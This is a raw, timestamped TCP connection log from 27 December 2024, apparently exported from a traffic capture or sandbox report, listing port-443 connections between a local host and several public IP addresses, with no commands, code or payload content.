                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:30.708131075 CET44349985116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:30.708225012 CET49985443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:30.711339951 CET49985443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:30.711353064 CET44349985116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:30.713378906 CET49985443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:30.713385105 CET44349985116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:30.975927114 CET49995443192.168.2.520.110.205.119
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:30.975967884 CET4434999520.110.205.119192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:30.976036072 CET49995443192.168.2.520.110.205.119
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:30.976264954 CET49995443192.168.2.520.110.205.119
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:30.976281881 CET4434999520.110.205.119192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:31.604626894 CET44349985116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:31.604651928 CET44349985116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:31.604695082 CET49985443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:31.604705095 CET44349985116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:31.604723930 CET49985443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:31.604753017 CET49985443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:31.605395079 CET49985443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:31.605416059 CET44349985116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:31.607942104 CET50001443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:31.607980967 CET44350001116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:31.608040094 CET50001443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:31.608227968 CET50001443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:31.608239889 CET44350001116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:31.631522894 CET44349988108.139.47.92192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:31.634587049 CET49988443192.168.2.5108.139.47.92
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:31.634610891 CET44349988108.139.47.92192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:31.634946108 CET44349988108.139.47.92192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:31.637166023 CET49988443192.168.2.5108.139.47.92
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:31.637232065 CET44349988108.139.47.92192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:31.637407064 CET49988443192.168.2.5108.139.47.92
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:31.650633097 CET50002443192.168.2.523.57.90.162
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:31.650672913 CET4435000223.57.90.162192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:31.650739908 CET50002443192.168.2.523.57.90.162
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:31.650960922 CET50003443192.168.2.523.57.90.162
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:31.650991917 CET4435000323.57.90.162192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:31.651329994 CET50004443192.168.2.5204.79.197.219
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:31.651340961 CET44350004204.79.197.219192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:31.651361942 CET50003443192.168.2.523.57.90.162
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:31.651993990 CET50004443192.168.2.5204.79.197.219
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:31.652234077 CET50004443192.168.2.5204.79.197.219
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:31.652252913 CET44350004204.79.197.219192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:31.652601957 CET50005443192.168.2.5204.79.197.219
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:31.652611971 CET44350005204.79.197.219192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:31.652676105 CET50005443192.168.2.5204.79.197.219
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:31.652823925 CET50003443192.168.2.523.57.90.162
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:31.652834892 CET4435000323.57.90.162192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:31.652925968 CET50002443192.168.2.523.57.90.162
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:31.652940989 CET4435000223.57.90.162192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:31.653259039 CET50005443192.168.2.5204.79.197.219
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:31.653271914 CET44350005204.79.197.219192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:31.679336071 CET44349988108.139.47.92192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:31.679373026 CET49988443192.168.2.5108.139.47.92
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.085952997 CET44349988108.139.47.92192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.086018085 CET44349988108.139.47.92192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.086380959 CET49988443192.168.2.5108.139.47.92
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.086658001 CET49988443192.168.2.5108.139.47.92
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.086677074 CET44349988108.139.47.92192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.086685896 CET49988443192.168.2.5108.139.47.92
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.088320017 CET49988443192.168.2.5108.139.47.92
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.106343985 CET4434998620.189.173.1192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.106612921 CET49986443192.168.2.520.189.173.1
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.106638908 CET4434998620.189.173.1192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.107657909 CET4434998620.189.173.1192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.107721090 CET49986443192.168.2.520.189.173.1
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.108714104 CET49986443192.168.2.520.189.173.1
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.108797073 CET4434998620.189.173.1192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.108973026 CET49986443192.168.2.520.189.173.1
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.108984947 CET4434998620.189.173.1192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.109005928 CET49986443192.168.2.520.189.173.1
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.109016895 CET4434998620.189.173.1192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.158318043 CET49986443192.168.2.520.189.173.1
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.585949898 CET4434999520.110.205.119192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.588994026 CET49995443192.168.2.520.110.205.119
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.589010954 CET4434999520.110.205.119192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.589382887 CET4434999520.110.205.119192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.592730999 CET49995443192.168.2.520.110.205.119
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.592803001 CET4434999520.110.205.119192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.592936039 CET49995443192.168.2.520.110.205.119
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.635333061 CET4434999520.110.205.119192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.653105021 CET4434998620.189.173.1192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.653223038 CET4434998620.189.173.1192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.653670073 CET49986443192.168.2.520.189.173.1
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.653703928 CET4434998620.189.173.1192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.653718948 CET49986443192.168.2.520.189.173.1
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.653750896 CET49986443192.168.2.520.189.173.1
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.954221964 CET4435000323.57.90.162192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.954466105 CET50003443192.168.2.523.57.90.162
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.954474926 CET4435000323.57.90.162192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.955478907 CET4435000323.57.90.162192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.955553055 CET50003443192.168.2.523.57.90.162
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.956732035 CET50003443192.168.2.523.57.90.162
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.956799030 CET4435000323.57.90.162192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.956969976 CET4435000223.57.90.162192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.957132101 CET50002443192.168.2.523.57.90.162
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.957149982 CET4435000223.57.90.162192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.958142996 CET4435000223.57.90.162192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.958215952 CET50002443192.168.2.523.57.90.162
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.958544970 CET50002443192.168.2.523.57.90.162
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.958609104 CET4435000223.57.90.162192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.003602982 CET50002443192.168.2.523.57.90.162
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.003608942 CET50003443192.168.2.523.57.90.162
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.003612041 CET4435000223.57.90.162192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.003622055 CET4435000323.57.90.162192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.050472021 CET50002443192.168.2.523.57.90.162
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.050497055 CET50003443192.168.2.523.57.90.162
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.055790901 CET44350001116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.056763887 CET50001443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.059776068 CET4434999520.110.205.119192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.059848070 CET4434999520.110.205.119192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.059920073 CET49995443192.168.2.520.110.205.119
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.063690901 CET50001443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.063700914 CET44350001116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.065933943 CET50001443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.065943003 CET44350001116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.067557096 CET49995443192.168.2.520.110.205.119
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.067579031 CET4434999520.110.205.119192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.243866920 CET44350004204.79.197.219192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.244112015 CET50004443192.168.2.5204.79.197.219
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.244143009 CET44350004204.79.197.219192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.245102882 CET44350004204.79.197.219192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.245161057 CET50004443192.168.2.5204.79.197.219
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.246121883 CET50004443192.168.2.5204.79.197.219
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.246180058 CET44350004204.79.197.219192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.287308931 CET44350005204.79.197.219192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.287652016 CET50005443192.168.2.5204.79.197.219
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.287672043 CET44350005204.79.197.219192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.288623095 CET44350005204.79.197.219192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.288691998 CET50005443192.168.2.5204.79.197.219
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.288984060 CET50005443192.168.2.5204.79.197.219
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.289028883 CET44350005204.79.197.219192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.298723936 CET50004443192.168.2.5204.79.197.219
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.298741102 CET44350004204.79.197.219192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.330095053 CET50005443192.168.2.5204.79.197.219
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.330102921 CET44350005204.79.197.219192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.345628023 CET50004443192.168.2.5204.79.197.219
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.376878023 CET50005443192.168.2.5204.79.197.219
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.718065023 CET49706443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.718107939 CET4434970623.1.237.91192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.720514059 CET50015443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.720527887 CET4435001523.1.237.91192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.720613956 CET50015443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.877644062 CET50015443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.877670050 CET4435001523.1.237.91192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:34.079200983 CET44350001116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:34.079231977 CET44350001116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:34.079282999 CET50001443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:34.079291105 CET44350001116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:34.079324007 CET50001443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:34.079391003 CET50001443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:34.079850912 CET50001443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:34.079871893 CET44350001116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:34.111773968 CET50016443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:34.111848116 CET44350016116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:34.111926079 CET50016443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:34.112209082 CET50016443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:34.112245083 CET44350016116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:35.288656950 CET4435001523.1.237.91192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:35.288774967 CET50015443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:35.511091948 CET44350016116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:35.511178970 CET50016443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:35.529481888 CET50016443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:35.529511929 CET44350016116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:35.531769037 CET50016443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:35.531800032 CET44350016116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:35.744066954 CET50021443192.168.2.520.189.173.1
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:35.744098902 CET4435002120.189.173.1192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:35.744172096 CET50021443192.168.2.520.189.173.1
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:35.744381905 CET50021443192.168.2.520.189.173.1
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:35.744395971 CET4435002120.189.173.1192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:36.085479975 CET50024443192.168.2.520.189.173.1
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:36.085526943 CET4435002420.189.173.1192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:36.085618973 CET50024443192.168.2.520.189.173.1
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:36.086208105 CET50024443192.168.2.520.189.173.1
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:36.086229086 CET4435002420.189.173.1192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:36.098704100 CET44349972116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:36.098783970 CET44349972116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:36.098898888 CET49972443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:36.101308107 CET49972443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:36.101330996 CET44349972116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:36.389198065 CET44350016116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:36.389273882 CET44350016116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:36.389276028 CET50016443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:36.389326096 CET50016443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:36.390188932 CET50016443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:36.390221119 CET44350016116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:36.588270903 CET50025443192.168.2.520.189.173.1
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:36.588303089 CET4435002520.189.173.1192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:36.588385105 CET50025443192.168.2.520.189.173.1
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:36.588934898 CET50025443192.168.2.520.189.173.1
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:36.588946104 CET4435002520.189.173.1192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:36.737895012 CET50026443192.168.2.520.189.173.1
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:36.737997055 CET4435002620.189.173.1192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:36.738090992 CET50026443192.168.2.520.189.173.1
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:36.738302946 CET50026443192.168.2.520.189.173.1
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:36.738346100 CET4435002620.189.173.1192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:37.160391092 CET50027443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:37.160449982 CET44350027116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:37.164778948 CET50027443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:37.169662952 CET50027443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:37.169681072 CET44350027116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:37.272747993 CET44349923172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:37.272816896 CET44349923172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:37.272936106 CET49923443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:37.273982048 CET44349924172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:37.274172068 CET44349924172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:37.274244070 CET49924443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:37.275628090 CET44349928172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:37.275705099 CET44349928172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:37.275772095 CET49928443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:37.275985003 CET44349925172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:37.276171923 CET44349925172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:37.276226997 CET49925443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:37.314702988 CET44349927172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:37.314857006 CET44349927172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:37.315054893 CET49927443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:37.348676920 CET44349926172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:37.348730087 CET44349926172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:37.348814011 CET49926443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:37.684098959 CET4435002120.189.173.1192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:37.684396982 CET50021443192.168.2.520.189.173.1
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:37.684416056 CET4435002120.189.173.1192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:37.684762001 CET4435002120.189.173.1192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:37.685055017 CET50021443192.168.2.520.189.173.1
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:37.685120106 CET4435002120.189.173.1192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:37.685250044 CET50021443192.168.2.520.189.173.1
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:37.685306072 CET50021443192.168.2.520.189.173.1
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:37.685334921 CET4435002120.189.173.1192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:37.861473083 CET4435002420.189.173.1192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:37.861814976 CET50024443192.168.2.520.189.173.1
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:37.861881018 CET4435002420.189.173.1192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:37.862266064 CET4435002420.189.173.1192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:37.862663984 CET50024443192.168.2.520.189.173.1
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:37.862782001 CET4435002420.189.173.1192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:37.862863064 CET50024443192.168.2.520.189.173.1
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:37.862937927 CET50024443192.168.2.520.189.173.1
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:37.862984896 CET4435002420.189.173.1192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:38.120671988 CET44349933172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:38.120726109 CET44349933172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:38.120774984 CET49933443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:38.157706976 CET44349932172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:38.157763958 CET44349932172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:38.157823086 CET49932443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:38.357604980 CET4435002520.189.173.1192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:38.358050108 CET50025443192.168.2.520.189.173.1
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:38.358081102 CET4435002520.189.173.1192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:38.359085083 CET4435002520.189.173.1192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:38.359165907 CET50025443192.168.2.520.189.173.1
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:38.359519005 CET50025443192.168.2.520.189.173.1
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:38.359575033 CET4435002520.189.173.1192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:38.359728098 CET50025443192.168.2.520.189.173.1
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:38.359738111 CET4435002520.189.173.1192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:38.359790087 CET50025443192.168.2.520.189.173.1
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:38.359807968 CET4435002520.189.173.1192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:38.408473015 CET50025443192.168.2.520.189.173.1
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:38.440702915 CET4435002420.189.173.1192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:38.440781116 CET4435002420.189.173.1192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:38.440871954 CET50024443192.168.2.520.189.173.1
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:38.441459894 CET50024443192.168.2.520.189.173.1
